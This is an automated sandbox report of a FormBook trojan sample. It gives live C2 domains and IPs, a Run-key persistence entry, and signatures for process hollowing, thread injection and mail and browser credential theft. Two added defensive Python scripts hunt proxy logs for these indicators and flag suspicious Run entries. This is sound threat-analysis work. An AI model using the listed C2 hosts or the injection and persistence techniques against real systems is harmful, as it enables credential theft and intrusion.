          Source: Yara matchFile source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          MITRE ATT&CK Matrix (the number in parentheses is the count of matching signatures for that technique)

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Registry Run Keys / Startup Folder (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection (512); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (512); Steganography; Compile After Delivery; Indicator Removal from Tools
          Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (15); Security Software Discovery (141); Virtualization/Sandbox Evasion (1); Process Discovery (2); Remote System Discovery (1); System Network Configuration Discovery (1)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (2); GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
          Behavior Graph ID: 756343  Sample: PrWP76ejHO.exe  Start date: 30/11/2022  Architecture: WINDOWS  Score: 100
          Signatures on the start node: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 3 other signatures

          Process tree (recovered from the behavior graph):
          PrWP76ejHO.exe (started)
            dropped: C:\Users\user\AppData\Local\Temp\iscan.exe, PE32
            iscan.exe (started)
              dropped: C:\Users\user\AppData\Roaming\...\iijhlev.exe, PE32
              signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Maps a DLL or memory area into another process
              iscan.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected)
                  DNS/IP: t4yfrance.com 50.87.143.200, ports 49715, 49716, 49717, UNIFIEDLAYER-AS-1US, United States; inhomeyoga.com 195.110.124.133, ports 49710, 80, REGISTER-ASIT, Italy; 5 other IPs or domains
                  signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
                  ipconfig.exe (started)
                    signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                  iijhlev.exe (started)
                    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    WerFault.exe (started)
                    conhost.exe (started)
                  iijhlev.exe (started)
                    WerFault.exe (started)
                    conhost.exe (started)
              conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
PrWP76ejHO.exe | 73% | ReversingLabs | Win32.Trojan.FormBook
PrWP76ejHO.exe | 32% | Virustotal |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\iscan.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\iscan.exe | 27% | ReversingLabs | Win32.Trojan.FormBook
C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe | 27% | ReversingLabs | Win32.Trojan.FormBook

Unpacked PE Files
Source | Detection | Scanner | Label
3.0.iscan.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.0.PrWP76ejHO.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
3.2.iscan.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.PrWP76ejHO.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
1.2.iscan.exe.8d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains
Source | Detection | Scanner
inhomeyoga.com | 11% | Virustotal
t4yfrance.com | 9% | Virustotal
fedefarmatour.online | 14% | Virustotal

URLs
Source | Detection | Scanner | Label
www.fedefarmatour.online/dwdp/ | 100% | Avira URL Cloud | malware
http://www.t4yfrance.com/dwdp/ | 100% | Avira URL Cloud | malware
http://www.a8-group.com/dwdp/ | 100% | Avira URL Cloud | malware
http://www.fedefarmatour.online/dwdp/ | 100% | Avira URL Cloud | malware
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
inhomeyoga.com | 195.110.124.133 | true | true | | unknown
t4yfrance.com | 50.87.143.200 | true | true | | unknown
www.a8-group.com | 194.58.112.174 | true | true | | unknown
fedefarmatour.online | 81.88.48.71 | true | true | | unknown
www.fedefarmatour.online | unknown | unknown | true | | unknown
www.t4yfrance.com | unknown | unknown | true | | unknown
www.inhomeyoga.com | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.fedefarmatour.online/dwdp/ | true | Avira URL Cloud: malware | unknown
http://www.t4yfrance.com/dwdp/ | true | Avira URL Cloud: malware | unknown
www.fedefarmatour.online/dwdp/ | true | Avira URL Cloud: malware | low
http://www.a8-group.com/dwdp/ | true | Avira URL Cloud: malware | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | 1x6VE38oK.22.dr | false | | high
https://search.yahoo.com?fr=crmas_sfp | ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr | false | | high
https://duckduckgo.com/chrome_newtab | ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr | false | | high
https://duckduckgo.com/ac/?q= | 1x6VE38oK.22.dr | false | | high
http://nsis.sf.net/NSIS_Error | PrWP76ejHO.exe | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr | false | | high
https://search.yahoo.com?fr=crmas_sfpf | ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 1x6VE38oK.22.dr | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | PrWP76ejHO.exe | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 1x6VE38oK.22.dr | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr | false | | high
Contacted Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
195.110.124.133 | inhomeyoga.com | Italy | 39729 | REGISTER-ASIT | true
50.87.143.200 | t4yfrance.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
194.58.112.174 | www.a8-group.com | Russian Federation | 197695 | AS-REGRU | true
81.88.48.71 | fedefarmatour.online | Italy | 39729 | REGISTER-ASIT | true
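The contacted domains, their IPs and the /dwdp/ path shared by all four C2 URLs are the network indicators to hunt for in web-proxy logs. The following is an added example, not part of the report: it flags requests to the four C2 domains or any label under them (so the www. variants listed above match too), to the four IPs directly, or to the /dwdp/ path, and records the missing User-Agent the report notes ("HTTP GET or POST without a user agent") as a corroborating signal next to another hit. The JSON log lines and their field names (ts, src, method, url, user_agent) are constructed for the example; only the indicators come from the report.

```python
"""Hunt web-proxy logs for this report's C2 indicators.

Added example, not part of the report. The JSON log lines and their field
names are constructed; the domains, IPs and the /dwdp/ path are the report's."""

import ipaddress
import json
from urllib.parse import urlsplit

# Registered domains from the report; www. variants are covered by suffix matching.
C2_DOMAINS = {"inhomeyoga.com", "t4yfrance.com", "a8-group.com", "fedefarmatour.online"}
C2_IPS = {ipaddress.ip_address(a) for a in
          ("195.110.124.133", "50.87.143.200", "194.58.112.174", "81.88.48.71")}
C2_PATH_PREFIX = "/dwdp/"  # shared across all four C2 domains in the report


def host_matches(host):
    """True for a C2 domain or any label under it, with a dot boundary so that
    notfedefarmatour.online does not match."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def classify(entry):
    """Return the list of reasons a log entry matches; empty means clean."""
    url = urlsplit(entry["url"])
    host = url.hostname or ""
    reasons = []
    if host_matches(host):
        reasons.append("c2-domain")
    try:
        if ipaddress.ip_address(host) in C2_IPS:
            reasons.append("c2-ip")
    except ValueError:  # hostname, not a literal IP
        pass
    if url.path.startswith(C2_PATH_PREFIX):
        reasons.append("c2-path")
    # The report notes GET/POST without a User-Agent; on its own that is too
    # noisy to alert on, so it is only recorded next to another hit.
    if reasons and not entry.get("user_agent"):
        reasons.append("no-user-agent")
    return reasons


def hunt(lines):
    """Parse JSON-lines proxy records and return (src, url, reasons) for each hit."""
    hits = []
    for line in lines:
        entry = json.loads(line)
        reasons = classify(entry)
        if reasons:
            hits.append((entry["src"], entry["url"], reasons))
    return hits


# Constructed proxy records: three C2 contacts from one host and two clean requests.
SAMPLE_LOG = [
    '{"ts": "2022-11-30T01:21:20Z", "src": "10.0.0.23", "method": "GET", '
    '"url": "http://www.t4yfrance.com/dwdp/", "user_agent": ""}',
    '{"ts": "2022-11-30T01:21:22Z", "src": "10.0.0.23", "method": "POST", '
    '"url": "http://www.inhomeyoga.com/dwdp/", "user_agent": ""}',
    '{"ts": "2022-11-30T01:21:25Z", "src": "10.0.0.23", "method": "GET", '
    '"url": "http://194.58.112.174/dwdp/", "user_agent": ""}',
    '{"ts": "2022-11-30T01:21:30Z", "src": "10.0.0.41", "method": "GET", '
    '"url": "https://www.example.com/index.html", "user_agent": "Mozilla/5.0"}',
    '{"ts": "2022-11-30T01:21:31Z", "src": "10.0.0.41", "method": "GET", '
    '"url": "https://notfedefarmatour.online/", "user_agent": "Mozilla/5.0"}',
]


if __name__ == "__main__":
    for src, url, reasons in hunt(SAMPLE_LOG):
        print(src, url, ",".join(reasons))
```

The path-only match is deliberately kept: FormBook rotates through many domains per build while the URI path stays fixed, so a /dwdp/ hit on a domain not in the list above is still worth a look. Treat the IP matches as short-lived; the Italian and US hosts are shared hosting (REGISTER-ASIT, UNIFIEDLAYER) and will serve unrelated sites.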
                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                          Analysis ID:756343
                                          Start date and time:2022-11-30 02:20:08 +01:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 8m 42s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:PrWP76ejHO.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:24
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@14/14@4/4
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 73.7% (good quality ratio 68%)
                                          • Quality average: 75.2%
                                          • Quality standard deviation: 30.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • TCP Packets have been reduced to 100
                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240, 20.42.73.29
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Not all processes were analyzed; the report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:21:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run oipsxnj C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
02:21:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run oipsxnj C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
02:21:30 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
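The two Autostart rows above are the persistence mechanism: a Run value named oipsxnj under HKCU relaunches the Roaming-directory copy at logon, passing the Temp-directory dropper as its first argument (the value data is truncated in the report). As an added example, not from the report, the following triages Run entries the way an analyst would read those rows: it splits the value data into image and arguments with Windows quoting rules and flags any path under a user-writable directory. The report's entry is used exactly as recorded, a benign Program Files entry is constructed as a control, and the live-registry read only runs on Windows.

```python
"""Triage HKCU Run entries like the two Autostart rows in this report.

Added example, not from the report. The report's entry is used exactly as
recorded there (its value data is truncated in the report); the benign
control entry is constructed; the live registry read only runs on Windows."""

import os
import re
import shlex
import sys

# Per-user locations a Run value should rarely point into.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata\\(local|locallow|roaming)|downloads|desktop)\\",
    re.IGNORECASE)

# value name -> value data, copied from the report's Autostart rows
REPORT_RUN_ENTRIES = {
    "oipsxnj": r'C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe '
               r'"C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca',
}


def split_command(value):
    """Split Run value data into (image, args) using Windows quoting (posix=False
    keeps backslashes literal); surrounding quotes are stripped from each token."""
    parts = shlex.split(value, posix=False)
    tokens = [p.strip('"') for p in parts]
    image = os.path.expandvars(tokens[0]) if tokens else ""
    return image, tokens[1:]


def triage(entries):
    """Return a finding for every entry whose image or arguments sit in a
    user-writable directory; the FormBook entry hits on both."""
    findings = []
    for name, value in entries.items():
        image, args = split_command(value)
        reasons = []
        if USER_WRITABLE.match(image):
            reasons.append("image-in-user-writable-dir")
        if any(USER_WRITABLE.match(a) for a in args):
            reasons.append("argument-in-user-writable-dir")  # re-launches the Temp dropper
        if reasons:
            findings.append({"name": name, "image": image, "args": args, "reasons": reasons})
    return findings


def live_hkcu_run_entries():
    """Enumerate the current user's Run key on Windows; returns {} elsewhere."""
    if sys.platform != "win32":
        return {}
    import winreg  # Windows-only module
    entries = {}
    key_path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            entries[name] = str(data)
            index += 1
    return entries


# The report's entry plus a constructed benign control outside user-writable paths.
SAMPLE_ENTRIES = dict(REPORT_RUN_ENTRIES)
SAMPLE_ENTRIES["VendorTool"] = r'"C:\Program Files\Vendor\tool.exe" /autostart'


if __name__ == "__main__":
    for f in triage(live_hkcu_run_entries() or SAMPLE_ENTRIES):
        print(f["name"], f["image"], f["reasons"])
```

On a live host the HKCU64 row means the same value is visible from both the 32-bit and 64-bit registry views, so one entry is expected, not two. Legitimate per-user installs (OneDrive, Teams and similar) also live under AppData\Local, so pair a hit from this rule with a signature or hash check (the report's SHA-256 values for iijhlev.exe and iscan.exe are listed in the dropped-file section) before acting on it.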
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.8041050886194944
                                          Encrypted:false
                                          SSDEEP:192:TAudawvDwZHBUZMX/g3jR9T/u7s3S274ItDdB:DdawvDwJBUZMX/g3jv/u7s3X4ItDdB
                                          MD5:D3E58825370A9CACD63AA4E4D610D741
                                          SHA1:F7A585CCB546E6A648498538B0605EC204FBC0EE
                                          SHA-256:1651821B53A4F9DD251C1953C1B72AE0B4011ACEAA488539FF2BD106CFE0394A
                                          SHA-512:4C47F499D4DBADF7049BFDB92E98D28F5AC21AB5642AE97A7BDD970E62ADDD10CBB1F0912516FE228DAB5C2919AD3ED84F365EFE44EDC8CD4C96FF4746ACC3A5
                                          Malicious:false
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.3.6.6.0.3.4.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.4.7.0.6.9.0.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.e.4.3.d.1.d.-.a.0.0.a.-.4.9.2.c.-.8.0.4.3.-.0.c.f.a.d.e.7.3.8.9.0.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.f.5.4.c.f.b.-.c.9.a.e.-.4.9.7.d.-.a.9.f.e.-.3.d.a.6.2.5.3.c.3.4.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.i.j.h.l.e.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.0.0.-.0.0.0.1.-.0.0.1.f.-.7.e.3.f.-.0.1.7.e.a.5.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.0.1.a.e.c.9.d.6.e.6.9.2.4.d.f.0.0.f.a.0.b.5.8.5.4.e.1.e.d.4.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.e.4.8.2.5.9.7.f.6.f.2.d.6.8.2.5.0.a.4.e.b.2.8.9.1.1.6.8.3.e.5.0.f.a.c.4.d.e.!.i.i.j.h.l.e.v...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.8114076405556345
                                          Encrypted:false
                                          SSDEEP:192:dy7awvTwZHBUZMX/g3jBR//u7s3S274ItDdBf:M7awvTwJBUZMX/g3j//u7s3X4ItDdB
                                          MD5:881007555D6141EE38396F9FA7BF3A14
                                          SHA1:CDC7784DF7C4DD49A3EF5ABB10B752D256B78EB6
                                          SHA-256:D7B254489920F804CF2FD39544563BE82347DADDA6984681709E507ED9724D4C
                                          SHA-512:1BB3A11587A8959C82FC524F7050ADA653B4E01D96D1F2918DE8E00304AD8B1FCD0CAD359526C0B839E4B65340EF861DC84AB0A385B44A81745F8454EE74E11E
                                          Malicious:false
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.0.1.9.7.3.1.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.7.7.2.8.2.0.5.6.6.7.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.0.3.a.b.f.4.-.2.7.f.6.-.4.3.9.a.-.9.b.7.b.-.4.a.5.8.e.e.9.c.f.d.6.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.3.1.b.8.7.4.-.7.1.a.3.-.4.2.d.b.-.b.b.f.3.-.d.d.8.0.2.a.4.0.6.b.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.i.j.h.l.e.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.7.4.-.0.0.0.1.-.0.0.1.f.-.f.b.7.7.-.0.a.7.9.a.5.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.0.1.a.e.c.9.d.6.e.6.9.2.4.d.f.0.0.f.a.0.b.5.8.5.4.e.1.e.d.4.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.e.4.8.2.5.9.7.f.6.f.2.d.6.8.2.5.0.a.4.e.b.2.8.9.1.1.6.8.3.e.5.0.f.a.c.4.d.e.!.i.i.j.h.l.e.v...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 10:21:21 2022, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):36978
                                          Entropy (8bit):2.094980958939099
                                          Encrypted:false
                                          SSDEEP:192:cPS9WAJmJotO9UHWmUcGk7XPzEJWjSi0XDS6FbzcZc:ITqmmg9UpGyh+XP
                                          MD5:2D96E5A0275FABD6DC46BA6A86F9ABE5
                                          SHA1:3837483602ED6BBC97307DC18ECE9169540EBBE2
                                          SHA-256:4C42A3E21ADFDCB82EAC0FFEDB79FBFA7E8BD9BFF72A9311FE18485FB3A0DDC1
                                          SHA-512:B8ADC0B9C406098E590A0BBECCC7AD109436C99955D00E6D56E1DF0A6DB8E401B88F25039E83A3276780CB46A65697350CFDF4357F5C23382F0322F10DFAA8B8
                                          Malicious:false
                                          Preview:MDMP....... ..........c........................................@$..........T.......8...........T...........0...B~..........p...........\....................................................................U...........B..............GenuineIntelW...........T.......t......c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8324
                                          Entropy (8bit):3.7043995876261486
                                          Encrypted:false
                                          SSDEEP:192:Rrl7r3GLNivC56P+aghd6YqhYSUEPcugmfAqgS+2CprV89bxsGsfBzKm:RrlsNiv862aghd6Y8YSUEkugmfAqgSFU
                                          MD5:FBDCA69F879137AF87609249DF723473
                                          SHA1:2B2A5976AE858D96B32364F6BB0354CA49ACB58C
                                          SHA-256:33F7BC8B7ECA2FF10E04ED46836350C0A1B74F9C45B9DB61816591B5977B1237
                                          SHA-512:81DDE1A21D59565FCA15830D437559C5327D39824573B8573FEC6A7A92414E414F23AEDDCC12D929C0BFF5D16088E6EDBC57A2FCB018ACBD432BA8ADF8814C81
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.6.8.<./.P.i.d.>.......
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4588
                                          Entropy (8bit):4.480173772723793
                                          Encrypted:false
                                          SSDEEP:48:cvIwSD8zsqJgtWI9JVWgc8sqYjs8fm8M4J62ZFtE+q8+mjB++Od:uITf4OkgrsqY9JRxEsjc+Od
                                          MD5:4980E483DD65840DE2CF11A7BB98A8E9
                                          SHA1:0305346ED6363F22F7000210E8884CDDD94629D8
                                          SHA-256:21DA4C57570B00D154DD236761AC94C1E7D347BCAD358645CAE3DBDF3A77122D
                                          SHA-512:E58D71FC52CDFEFF1F50E1D2CBCA149C1093670229330B2F5DB88943D4922A2F096CDDE37B261DA3D5CBA8B7EE4ABE559B2311884351BA27ED576F97BBB916BC
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802612" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 10:21:24 2022, 0x1205a4 type
                                          Category:dropped
